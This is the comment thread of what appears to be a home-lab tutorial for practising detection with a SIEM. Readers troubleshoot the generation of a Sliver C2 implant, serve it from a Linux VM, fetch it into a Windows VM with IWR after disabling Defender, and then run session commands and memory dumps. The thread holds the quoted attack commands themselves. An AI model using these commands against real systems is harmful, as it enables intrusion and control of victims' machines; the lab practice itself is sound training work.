88 Comments

Hi Eric - Thank you so much for putting this together. I'm a bit stuck on the step executing the C2 payload on the Windows VM. I went back to make sure I was doing everything in order, but I'm getting an error message after executing the command "C:\Users\User\Downloads\NUCLEAR_CHAIR.exe" in the administrative PowerShell - it says "The term 'C:\Users\User\Downloads\NUCLEAR_CHAIR.exe' is not recognized as the name of a cmdlet, function, script file, or operable program." Everything leading up to the step has gone off without a hitch.

Could you please provide some guidance as to what's going on here? I appreciate your time, thanks!

Expand full comment

Make sure the payload is actually there by cd'ing to that location and running ls

cd C:\Users\User\Downloads\

ls

Make sure you see it there, if not, re-download it.

Expand full comment

It wasn't there! While redownloading I noticed a pop-up in the Windows VM notifying me of a security risk "NUCLEAR_CHAIR.exe"

I clicked the notification and selected "allow on device." I can try to continue from here, but I must've missed something during the steps disabling this on the Windows VM. Should I go back and reconfigure the Windows VM from the first section?

Thank you for your quick response and assistance!

Expand full comment

Just to follow up - I went back and re-disabled Microsoft Defender following the steps before and realized I missed one of the steps in the regedit section.

Back on track and everything is working as it should! Thank you!

Expand full comment

Hello. I have the same issue-the payload file is on the Linux machine, but not the Windows VM in "Downloads,"-only the sensor is saved there. I re-ran through the steps, downloaded a second payload, same thing. I did not receive a pop-up in the Windows VM warning me of a security risk either time. So my payload files are not making it to the Windows VM.

Expand full comment

NM. Did not disable Defender on the Windows VM....

Expand full comment

Hello Eric, I cannot SSH into my Linux VM from my host machine. Is that a problem that I should be concerned with?

Expand full comment

There is no need to SSH you can proceed with the steps mentioned above

Expand full comment

I am getting cd: /opt/sliver: not a directory for some reason.

Expand full comment

You must've missed a step in part 1, specifically the part where we run mkdir -p /opt/sliver

I recommend re-accomplishing the attack system setup steps in part 1.

Expand full comment

Thank you! I will try it again.

Expand full comment

Not sure if I'm doing something wrong but I can't seem to get sliver to have any sessions appear.

I was able to get the payload on the windows VM and run the .exe but when I go to Sliver and run http it says "Job #2 Stopped and shows No sessions

Attempted rebooting the win VM but still not dice

Expand full comment

Very nice. Every step worked perfectly. Got an error when running

sliver> http

but I just restarted the VM and it worked the second time.

Expand full comment

I'm continuously getting the "IWR : Unable to connect to the remote server"

Is there anything suggested to get around this issue? Thanks

Expand full comment

Fixed this by deleting the linux VM and restarting from scratch.

Love this outline, thanks so much for the resource and practice field!

Expand full comment

Part 2, Step 7 gives me this error:

PS C:\Windows\system32> IWR -Uri http://[Linux_VM_IP]/[payload_name].exe -Outfile C:\Users\User\Downloads\[payload_name].exe

Invoke-WebRequest : Cannot bind parameter 'Uri'. Cannot convert value "http://[Linux_VM_IP]/[payload_name].exe" to

type "System.Uri". Error: "Invalid URI: The hostname could not be parsed."

At line:1 char:10

+ IWR -Uri http://[Linux_VM_IP]/[payload_name].exe -Outfile C:\Users\Us ...

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ CategoryInfo : InvalidArgument: (:) [Invoke-WebRequest], ParameterBindingException

+ FullyQualifiedErrorId : CannotConvertArgumentNoMessage,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

Expand full comment

Fun stuff! I know this is old news now, but I have had two issues so far.

First, as I am often known to do, I attempted to take the "easy" option of using "Sordum’s Defender Control" to disable Defender. The download was rar'ed and didn't contain an .exe file. Ru roh Raggy! I am thinking it could be malware, but what do I know.

Second, and this is what has stopped me for now, I am unable to get the sliver server to check in on the client once it starts. After executing the payload ( love saying that) nothing happens. No joy.

I will attempt to start from the beginning and try again later today. Thanks!

Expand full comment

Hi Eric, when trying to run the C2 executable on Powershell I keep getting the error " Program 'FUZZY_MIDI.exe' failed to run: The specified executable is not a valid application for this OS platform. At line: 1 Char: 1:" any idea how to troubleshoot? Do you think it might be Defender or because I downloaded the latest version of Microsoft and perhaps they patched the payload hmmm... I'll try to figure it out in the meantime.

Expand full comment

I had errors downloading the payload because of connection issues. What I did was revert back to the malware staged snapshot and redid the whole process this time successfully downloading the full payload correctly.

Expand full comment

Hi Eric, this has been a fun project so far, thanks!

I am not able to run the netstat cmd inside sliver and can't figure out why.

So far, everything other cmd works as intended, when I run netstat it just hangs forever with no data. I have to use ctrl+C to back out.

I am connected to the active session with the use [session ID] cmd

pwd shows C:/windows/system32

I can run netstat from the windows vm command line and get results, ping and dns are both working for internal and external connections

getprivs cmd shows the correct process attributes as enabled (exploit was ran as admin)

I'm blanking here, any help is appreciated.

Thanks!

Expand full comment

Hi Eric, thanks for this walkthrough.

I am trying to set up or generate the C2 payload as you described(generate --http 192.168.42.128 --save /opt/sliver) for my ubuntu server via Putty(ssh) but i get the error "error:unknown command, try help"

i have tried sudo but nothing is successful

Expand full comment

I have figured it out , Eric. there was space in the command(just before generate part) hence why it did not work. a little patience is needed to troubleshoot i guess

Expand full comment

Hey Eric, I am having a lot of trouble getting the SeDebugPrivilege to show up enabled. The first time I did it it showed up enabled. the next day it said disabled so I regenerated the implant and it was enabled. I then ran into errors dumping memory so I tried to use a new implant and since then I have not been able to get SeDebugPrivilege to be enabled. Have you ever ran into this?

Expand full comment

Make sure you are running the implant with admin privileges.

Expand full comment

Ye, that's the odd thing. I have in CMD launched the implant with admin. and I have also launched in GUI with admin. I even launched the same implant once and it worked and closed it and launched again and it didn't, and now none seem to want to work. I'm considering now its some bug on the Ubuntu side. Thanks for the reply!

Expand full comment

Eric, I'm stuck right at the beginning of this step. When I enter "sliver-server", I get nothing in return. I've tried Googling it but haven't had any luck.

Expand full comment

Make sure you are working out of /opt/sliver by running this command first: cd /opt/sliver

Expand full comment

Thank you for the quick response.

Okay, that got me into /opt/sliver and I ran the sliver-server command like it said and I'm still getting nothing. Are these steps a little out of order or am I just that much of a rookie? I see the cd /opt/sliver command is step 6, but I needed it before step two.

Expand full comment

I am getting the sense that something got out of order here... I might try going back through the Linux VM setup instructions.

Expand full comment

So I followed the VM instructions accurately but what I think may be the issue is whenever I try running the command to download Sliver, I get a lot of "Err" codes -Temporary failure resolving 'archive.ubuntu.com', and "E:" codes- Failed to fetch http://archive.ubuntu.com.

The following command to create a working directory does nothing.

Expand full comment

Seems it may be an internet connectivity issue for the VM.

Expand full comment

I pinged 8.8.8.8 and it worked fine. It just doesn't work with domain names, it seems.

Expand full comment

I started back from the beginning and reinstalled the Linux VM. When I try to ping Google.com, I get this error: (ping: Google.com: temporary failure in name resolution). The last time, I also had this but ended up Googling how to add the Google IP addresses and make the ping work. I didn't realize none of the other domains would be reachable, which seems obvious now. Any idea why the Linux VM is having issues connecting to the internet? I followed everything to a T.

Expand full comment

Hello Eric, I am stuck at the generate a C2 payload using sliver. I am not able to generate a payload even after typing the command: generate --http 10.0.2.15 --save /opt/sliver.

It says command not found sometimes and sometimes just shows random github directory lines. Do help

Expand full comment

This is a symptom of using a different Ubuntu ISO than the one prescribed.. The desktop Ubuntu does not come with git preinstalled... Remedy with apt install git

Expand full comment

IWR -Uri http://10.0.2.15/DARK_SHADE.exe -Outfile C:\Users\User\Downloads\DARK_SHADE.exe

IWR : Unable to connect to the remote server

At line:1 char:1

+ IWR -Uri http://10.0.2.15/DARK_SHADE.exe -Outfile C:\Users\User\Downl ...

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebReques

t], WebException

+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCo

mmand

I get this error when I try to download the payload from the Ubuntu VM to the Windows VM. Should i add a firewall rule or something?

Both my Windows and Ubuntu VM have the IP address of 10.0.2.15. They are configured using NAT.

Expand full comment

Both VMs cannot have the same IP. Make sure you have two different IPs on the VM subnet.

Expand full comment

I am using Virtual Box. Both the VMs are created in NAT mode. When I checked both IPs, they get assigned the same. I went with your blog for NAT. Should I use bridged mode instead?

Expand full comment

The NAT only impacts the VMs traffic leaving the VM subnet, it should not affect the internal IPs assigned within the VM subnet... Sorry, I cannot give much guidance on VirtualBox as I haven't used it in a couple years.

Expand full comment

Okay Eric.

And one more thing, when I install VMware workstation pro, it asks for admin rights to run, is it a problem if I give it that?

If I give admin rights, does it impact my folder creation and document saving rights?

Expand full comment

It worked! Thank you so much Eric!!

Expand full comment

No doubt missed something, but I've been working back through the steps and cannot find the cause. 22 is open and listening, I can ping the Linux VM, but the MS VM will not connect to the remote server. Continue to get the following:

PS C:\Windows\system32> IWR -Uri http://192.168.44.128/opt/sliver/UNUSUAL_HERON.exe -Outfile C:\Users\User\Downloads\Unusual_Heron.exe

IWR : Unable to connect to the remote server

At line:1 char:1

+ IWR -Uri http://192.168.44.128/opt/sliver/UNUSUAL_HERON.exe -Outfile ...

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException

+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

Any initial thoughts what I might be overlooking?

Expand full comment

In this case, port 22 doesn't play a role. The temporary web server should be listening on port 80. Be sure you've run the python3 -m http.server 80 step properly.

Expand full comment

Got it! thanks I been experiencing my VMS are running super slow. So I did some testing and I'm using about 90% of the 16gb of ram that I have on my laptop lol. I might have to upgrade or maybe I can get my hands on a window pc or laptop.

Expand full comment

My PC has 16GB and was having the same experience while running the Win VM. It looks like that VM comes preconfigured with 8GB Memory and 4 Processors. I bumped the processors down to 2 instead of 4 and had a much better experience. Hope this is helpful!

Expand full comment

I'll add a comment in the post, thanks for pointing that out.

Expand full comment

Glad to help. Also, thanks for putting this out there! It's my first time messing with a SIEM, much less standing one up in a virtualized environment. This has been really helpful to get some hands-on experience!

Expand full comment